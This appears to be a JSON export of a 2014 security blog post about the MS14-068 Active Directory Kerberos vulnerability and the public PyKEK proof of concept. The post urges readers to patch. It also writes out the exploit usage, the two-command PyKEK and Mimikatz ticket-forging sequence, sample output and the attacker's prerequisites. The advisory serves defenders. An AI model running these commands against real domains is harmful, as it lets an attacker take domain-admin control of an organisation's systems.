{"id":660,"date":"2014-12-06T22:17:41","date_gmt":"2014-12-07T03:17:41","guid":{"rendered":"http:\/\/adsecurity.org\/?p=660"},"modified":"2015-12-30T11:51:25","modified_gmt":"2015-12-30T16:51:25","slug":"ms14-068-kerberos-vulnerability-privilege-escalation-poc-posted-pykek","status":"publish","type":"post","link":"https:\/\/adsecurity.org\/?p=660","title":{"rendered":"MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)"},"content":{"rendered":"<p>As noted in previous posts on <a title=\"MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege\" href=\"https:\/\/adsecurity.org\/?p=525\">MS14-068<\/a>, including a <a title=\"Kerberos Vulnerability in MS14-068 Explained\" href=\"https:\/\/adsecurity.org\/?p=541\">detailed description<\/a>, a Kerberos ticket with an invalid PAC checksum causes an unpatched Domain Controller to accept invalid group membership claims as valid for Active Directory resources. The MS14-068 patch modifies <a title=\"MS14-068: Active Directory Kerberos Vulnerability Patch for Invalid Checksum\" href=\"https:\/\/adsecurity.org\/?p=574\">KDC Kerberos signature validation <\/a>processing on the Domain Controller.<\/p>\n<p>This issue is FAR worse than the Kerberos \u201cGolden Ticket\u201d issue since an attacker doesn\u2019t need the domain Kerberos service account\u00a0<a href=\"https:\/\/adsecurity.org\/?p=483\">(KRBTGT)<\/a> NTLM password hash (only accessible from a Domain Controller with domain-level admin privileges) for exploit. The attacker simply modifies the existing TGT by changing the group membership to have access to everything in Active Directory and creates a specific invalid checksum for the PAC signature causing the DC to validate it.<\/p>\n<p>If you haven&#8217;t installed the MS14-068 patch (released on November 18th, 2014), the exploit code is now available for all to use. 
Microsoft KB3011780 patches this issue.<br \/>\n<strong>Patch your Domain Controllers Now!<\/strong><\/p>\n<h4><span style=\"text-decoration: underline;\">MS14-068 References:<\/span><\/h4>\n<ul>\n<li><a title=\"MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege\" href=\"https:\/\/adsecurity.org\/?p=525\">AD Kerberos Privilege Elevation Vulnerability: The Issue<\/a><\/li>\n<li><a title=\"Kerberos Vulnerability in MS14-068 Explained\" href=\"https:\/\/adsecurity.org\/?p=541\">Detailed Explanation of MS14-068<\/a><\/li>\n<li><a title=\"Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=676\">Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)<\/a><\/li>\n<li><a title=\"PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works\" href=\"https:\/\/adsecurity.org\/?p=763\">PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works<\/a><\/li>\n<\/ul>\n<h4><em><strong>UPDATE: I have successfully tested this MS14-068 exploit in my lab and <a title=\"Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=676\">posted detailed information on how to exploit Kerberos on vulnerable Domain Controllers including Wireshark pcaps and DC event logs<\/a>.<\/strong><\/em><\/h4>\n<p>Sylvain Monn\u00e9 tweeted about his Python code (<a href=\"https:\/\/github.com\/bidord\/pykek\">Python Kerberos Exploitation Kit<\/a> aka PyKEK) late Thursday, December 4th, stating it can be used to exploit the Kerberos vulnerability patched in MS14-068.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/MS14068-POC-Tweet.png\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-661 aligncenter\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/MS14068-POC-Tweet-300x286.png\" alt=\"MS14068-POC-Tweet\" width=\"300\" height=\"286\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/MS14068-POC-Tweet-300x286.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/MS14068-POC-Tweet.png 774w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>Note that the POC is effective against Domain Controllers running Windows Server 2008 R2 and earlier. Microsoft noted in the patch release that &#8220;<a href=\"http:\/\/blogs.technet.com\/b\/srd\/archive\/2014\/11\/18\/additional-information-about-cve-2014-6324.aspx\"><em>Windows Server 2012 impact is less vulnerable than previous Windows versions (i.e., it&#8217;s much harder to exploit on Windows Server 2012\/2012R2)<\/em><\/a>&#8221;.<\/p>\n<p>The POC is now in Metasploit.<\/p>\n<p>POC usage example:<\/p>\n<blockquote>\n<pre><code>ms14-068.py -u &lt;userName&gt;@&lt;domainName&gt; -s &lt;userSid&gt; -d &lt;domainControlerAddr&gt;\r\n<\/code><\/pre>\n<pre><code>  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!\r\n  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!\r\n  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!\r\n  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!\r\n  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!\r\n  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!\r\n  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!\r\n  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!\r\n  [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'...
Done!<\/code><\/pre>\n<\/blockquote>\n<p>According to the PyKEK documentation, the modified TGT now has the following groups included:<\/p>\n<ul>\n<li>Domain Users (513)<\/li>\n<li>Domain Admins (512)<\/li>\n<li>Schema Admins (518)<\/li>\n<li>Enterprise Admins (519)<\/li>\n<li>Group Policy Creator Owners (520)<\/li>\n<\/ul>\n<p>Since the TGT is signed by the KDC Service (<a title=\"Kerberos &amp; KRBTGT: Active Directory\u2019s Domain Kerberos Account\" href=\"https:\/\/adsecurity.org\/?p=483\">KRBTGT domain account<\/a>), it is valid and can be used to access Active Directory resources based on the group membership (which was forged and is now validated by the DC).<\/p>\n<p>At this point, <a title=\"Mimikatz and Active Directory Kerberos Attacks\" href=\"https:\/\/adsecurity.org\/?p=556\">Mimikatz<\/a> can load the new TGT and use it to connect to resources.<\/p>\n<p>Two commands are all that&#8217;s necessary to exploit:<\/p>\n<blockquote>\n<pre><code>python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc\r\nmimikatz.exe \"kerberos::ptc TGT_user-a-1@dom-a.loc.ccache\" exit<\/code><\/pre>\n<\/blockquote>\n<p><strong>Requirements:<\/strong><\/p>\n<p>The bar is fairly low in order to exploit MS14-068. Effectively, admin rights on a single domain-joined computer are all that&#8217;s needed. The other items aren&#8217;t that difficult once this access is attained.<\/p>\n<ul>\n<li>Admin access to a computer joined to the target domain<\/li>\n<li>Access to domain credentials &#8211; a domain user account is fine.<\/li>\n<li><a href=\"https:\/\/www.python.org\/\">Python<\/a> installed on the computer.<\/li>\n<li><a title=\"Mimikatz and Active Directory Kerberos Attacks\" href=\"https:\/\/adsecurity.org\/?p=556\">Mimikatz<\/a> on the computer<\/li>\n<\/ul>\n<p><span style=\"text-decoration: underline;\"><strong>References:<\/strong><\/span><\/p>\n<ul>\n<li>The Python script MS14-068 POC code: <a href=\"https:\/\/github.com\/bidord\/pykek\">Python Kerberos Exploitation Kit<\/a> (PyKEK)<\/li>\n<li><a title=\"Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=676\">Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)<\/a><\/li>\n<li><a title=\"PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works\" href=\"https:\/\/adsecurity.org\/?p=763\">PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>As noted in previous posts on MS14-068, including a detailed description, a Kerberos ticket with an invalid PAC checksum causes an unpatched Domain Controller to accept invalid group membership claims as valid for Active Directory resources. The MS14-068 patch modifies KDC Kerberos signature validation processing on the Domain Controller.
This issue is FAR worse than &hellip; <\/p>\n<p><a class=\"more-link btn\" href=\"https:\/\/adsecurity.org\/?p=660\">Continue reading<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,2],"tags":[20,380,337,80,81,331,298,335,295,333,697,332,329,330],"class_list":["post-660","post","type-post","status-publish","format-standard","hentry","category-microsoft-security","category-technical-reference","tag-activedirectory","tag-cve-2014-6324poc","tag-kb3011780","tag-kdc","tag-kerberos","tag-kerberoschecksumvulnerability","tag-kerberoshacking","tag-metasploit","tag-ms14068","tag-ms14068exploitcode","tag-pac","tag-poc","tag-pykek","tag-pythonkerberosexploitationkit","item-wrap"],"_links":{"self":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/660","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=660"}],"version-history":[{"count":17,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/660\/revisions"}],"predecessor-version":[{"id":2342,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/660\/revisions\/2342"}],"wp:attachment":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=660"}],"curies":[{"nam
e":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}